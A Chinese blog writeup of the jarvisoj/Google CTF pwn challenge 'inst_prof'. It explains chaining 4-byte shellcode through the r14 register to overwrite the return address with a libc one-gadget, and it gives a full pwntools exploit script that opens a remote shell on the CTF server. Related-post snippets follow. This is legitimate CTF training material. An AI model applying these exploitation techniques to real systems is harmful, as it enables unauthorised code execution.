jarvisoj pwn inst_prof writeup

最新推荐文章于 2021-11-22 21:36:43 发布
最新推荐文章于 2021-11-22 21:36:43 发布
阅读量729 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/79144466
版权

这题其实是google ctf的一道题
看到的时候完全震惊了。。。4字节shellcode。。。这要怎么弄啊
想了半天想不出,然后看了下别人的wp,又一次被震惊了,还有这种骚操作。。。

在执行shellcode的时候,r14这个寄存器是不变的,所以可以用r14这个寄存器来存一些重要的东西

然后就是怎么get到shell 呢?

我这里来一套别的骚操作,不用别的wp里面的rop

首先先来说一个magic number

这个操作是我从另外的题里面学到的,每个libc都存在一个地址,跳转到这个地址就可以一发get shell(仅在x64下试验过,貌似x86是不行的),这个地址,也是偏移,被称为magic number,每个libc的magic number虽然不同,但是可以通过搜索/bin/sh,然后可以找到几个地方,类似下图
这里写图片描述
比如这题,magic number 就是0x4647c

找到这个magic number之后呢?

当然是把[rsp] 的值改为这个magic number+libc_base

这题的话,在rsp+64的地方是存这__libc_start_main+xxx的地址,这个xxx每个libc也不同的,但是代码都是差不多
这里写图片描述
这里的值为0x21f45+libc_base,也就是call rax的下一个地址

我们先 mov r14,rsp
然后执行64次 inc r14
再mov r14,[r14]
这个时候r14存的值就是0x21f45+libc_base

下一步我们要把r14改成magic number+libc_base

所以我们只要把r14 加上offset=(magic_number-0x21f45)

这里可以利用题目执行0x1000次shellcode这个特点来缩短时间,也就是穿进去 add r14,offset/0x1000
之后再用inc r14加上剩下的数

最后 mov [rsp],r14就可以get 到shell了

ps:这里三字节的指令都加了ret来加速

下面是payload

from pwn import *

context.arch='amd64'

dec_r14=asm('dec r14')+asm('ret')
inc_r14=asm('inc r14')+asm('ret')
mov_r14_rsp=asm('mov r14,rsp')+asm('ret')
mov_r14_rr14=asm('mov r14,[r14]')+asm('ret')
mov_rrsp_r14=asm('mov [rsp],r14')

debug=0
if debug:
    p=process('./inst_prof')
    #gdb.attach(proc.pidof(p)[0])
    offset=0xD691F-0x202B1
    #context.log_level='debug'
else:
    p=remote('pwn2.jarvisoj.com', 9893)
    #offset=0xEA33D-0x21F45
    offset=0x4647C-0x21F45

def exe(es):
    p.send(es)
    p.recvuntil('\x00\x00\x00')

p.recvuntil('initializing prof...')
p.recvuntil('ready')
exe(mov_r14_rsp)
for i in range(64):
    exe(inc_r14)
exe(mov_r14_rr14)
t1=int(int(offset/0x1000)/2)
t2=offset-t1*0x1000*2
add_t1=asm('add r14,%d'%t1)
print(t1)
exe(add_t1)
exe(add_t1)
print('start inc!')
print(t2)
for i in range(t2):
    exe(inc_r14)
p.send(mov_rrsp_r14)
p.interactive()
charlie_heng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
google ctf 2017 inst_prof writeup
jmp esp
06-23 1181
题目题目本身比较神奇,当时看到这道题的时候还懵了一下,一下子没有太好的思路,不过后两天还有考试所以也没太静下心来想,今天刚考完了再来看这道题感觉其实难度并不是很大。题目给出了一个二进制文件,本能的checksec:[*] '/home/vagrant/ctf/contests/googlectf-2017/inst_prof/inst_prof' Arch: amd64-64-lit
格式化字符串类盲pwn的dump方法
weixin_46483787的博客
04-11 606
有一类题目,不会给任何文件,只给一个ip和端口,这种称为blind pwn(盲pwn),如果这类pwn存在格式化字符串漏洞的话,可以通过一些手法拿到整个二进制程序,这对我们的逆向分析和解题是十分重要的,举个例子: 在2022年的Insomni’hack teaser比赛上,有一道题CovidLe$s,就是一道盲pwn,输入什么就回显什么,但是存在格式化字符串漏洞,并且应该是栈上的,通过不断的尝试是可以大致猜测出栈结构的: 从偏移12开始是栈上的缓冲区,29那里是canary,31是返回地址,根据后三位可以
CTF Blind pwn题型学习笔记
lifanxin的博客
08-31 1922
Blind pwn概述如何辨别漏洞类型逻辑漏洞盲打格式化字符串盲打原理阐述例题讲解axb_2019_fmt32栈溢出盲打堆盲打总结 概述   所谓Blind pwn,即是在无法获得二进制程序文件的情况下对题目进行漏洞利用。这篇博客主要是将见到过的盲打pwn题做一个总结,大概可以分为以下几类盲打pwn题:逻辑漏洞盲打、格式化字符串盲打、栈溢出盲打、堆盲打。 如何辨别漏洞类型   对于盲打题,首先第一步应该是判断属于哪种类型的盲打,判断的步骤也很简单,nc连上后,直接看程序提供的菜单功能。   一般来说,需要逻
攻防世界PWN之stackoverflow(栈溢出盲打)题解
seaaseesa的博客
01-28 1913
Stackoverflow 这题,没有提供给我们二进制文件,仅仅有一个可交互的地址。由题意也可以知道,它存在栈溢出。这是一个栈溢出盲打的题目。 首先,就是确定栈溢出的长度 我们发现,当我们输入23个整数后,就发生了溢出报错,同时,我们也知道了,这个程序开启了canary机制,这正好被我们利用起来判断栈溢出的长度。 接下来,就是泄露栈数据了,主要依靠功能3,它会把数组里的数据相邻的去重后...
jarvisoj)(pwn)guestbook2/level6_x64
PLpa的博客
08-28 1116
guestbook2和level6_x64真的是一摸一样的,两个题目除了提示文字不同,其他的漏洞根本一样,鉴于jarvisoj中的pwn服务器比pwn2服务器要稳定一点,所以这里就写guestbook2。 前言: 这里,我提供两种方法解题,一种是利用unlink的任意地址读写功能泄露libc基址,一种是用unsorted bin和use after free来泄露libc基址,两种方法都行。 漏洞...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
Pwn】wp
weixin_52553215的博客
11-22 730
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
XCTF warmup
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-10 1120
这题没有二进制文件 最简单的一个盲打pwn题 。虽然难的题目我还不会 只有一个ip和一个端口 nc连接上去看看 发现程序会给我们返回一个地址 猜测这个地址就是后门函数的地址 写了个爆破程序 from pwn import * def blast(ip,port,padd_start,padd_end,addr): for i in range(padd_start,padd_end): ...
【学习笔记】CTF PWN选手的养成(二)
prettyX的博客
11-25 1883
第三章 漏洞利用技术 课时1 栈溢出-这些都是套路 0X01 基础知识 1、寄存器:rsp/esp、rbp/ebp等 2、栈: 3、函数调用:call、ret 4、调用约定: __stdcall、__cdecl、__fastcall、__thiscall、__nakedcall、__pascal 5、参数传递:取决于调用约定,默认如下 X86从右向左入栈 X64优先寄存器,参数过...
hackme inndy pwn tictactoe writeup
charlie_heng的专栏
01-03 540
昨天立的果然是个flag。。。。还是忍不住做了 这题ai其实很容易破,有个任意内存写,直接写到胜利就可以了 但是怎么get shell呢? 看了下,发现初始化的时候把一段地址设为可写了,那段地址存的是DT_SYMTAB之类的地址,所以很明显,这题是ret2dlresolve,那么怎么改呢? 最快的方法是改DT_STRTAB,当执行到memset的时候,把它的字符串变为system,然后再将...
jarvis oj level6
发蝴蝶和大脑斧的博客
01-10 1159
原来的附件有点问题,重新发过了. 主要用了两个技术:1.溢出泄露libc地址,heap地址.2.unsafe_unlink,这个how2pwn上unsafe_unlink.c里写的很清楚. 首先看泄露libc地址 New("A"*0x80)#0 New("B"*0x80)#1 Delete(0) New("123") List() c=p.recvuntil('AAAA') leak_addr=u...
【SCTF&&CCTF 2016】 PWN_WRITEUP
wintersun的地带
05-15 3713
这里是摘要吗
volga-ctf-quals-2016 pwn web_of_scicen_250 writeup
jmp esp
11-30 827
基本情况我并没有参加这个比赛,只是作为练习用,所以无法模拟远程,只能本地调试文件是64位的,运行之后先输入名字,然后每次都会输出这个名字,然后问你10道数学题,后面怎样的其实对这个版本的利用来说不是很重要漏洞情况整个函数比较长,不过我还是复制下来方便解释(来源于radare2, 如果不依赖ida的F5, radare2一些时候比ida还好用,特别是在pwn当中):/ (fcn) sub.puts_7
rois welpwn -xman
u014281987的博客
08-28 827
echo 函数有栈溢出,把之前read的字符串复制到栈里,可素64位rop指令有00,所以根据echo函数逻辑,一个pop之类的后面的ret就覆盖不了,rop到此为止。不过看看main,木有截断哦,所以ppppr = 0x40089c这个就是为了把之前main栈里的24个a和一个pppr弹出来,接着不就可以之后写个ret,继续构造rop了吗!所以利用上一个栈桢是很有用滴,比如robot那个构造递归
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2400
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
jarvisoj_level1
最新发布
08-28
很抱歉,我无法回答这个问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦](https://download.csdn.net/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值